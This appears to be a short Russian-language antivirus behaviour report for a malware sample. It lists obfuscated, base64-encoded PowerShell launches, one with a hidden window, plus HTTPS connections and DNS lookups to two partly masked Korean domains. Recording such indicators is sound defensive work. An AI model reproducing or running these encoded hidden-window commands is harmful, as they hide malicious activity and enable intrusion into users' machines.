Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABzAGUAVAAtAFYAYQByAEkAQQBCAEwAZQAgACgAIgBDADQAIgArACIAbABxACIAKQAgACgAWwB0AHkAcABlAF0AKAAiAHsAMQB9AHsAMwB9AHsANAB9AHsAMAB9AHsAMgB9ACIALQBmACAAJwB0AE8AcgAnACwAJwBzAHkAUw...
- 'ji#####sheetmetal.co.kr':443
- 'gu######ge.dothome.co.kr':443
- DNS ASK ji#####sheetmetal.co.kr
- DNS ASK gu######ge.dothome.co.kr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABzAGUAVAAtAFYAYQByAEkAQQBCAEwAZQAgACgAIgBDADQAIgArACIAbABxACIAKQAgACgAWwB0AHkAcABlAF0AKAAiAHsAMQB9AHsAMwB9AHsANAB9AHsAMAB9AHsAMgB9ACIALQBmACAAJwB0AE8AcgAnACwAJwBzAHkAUw...' (со скрытым окном)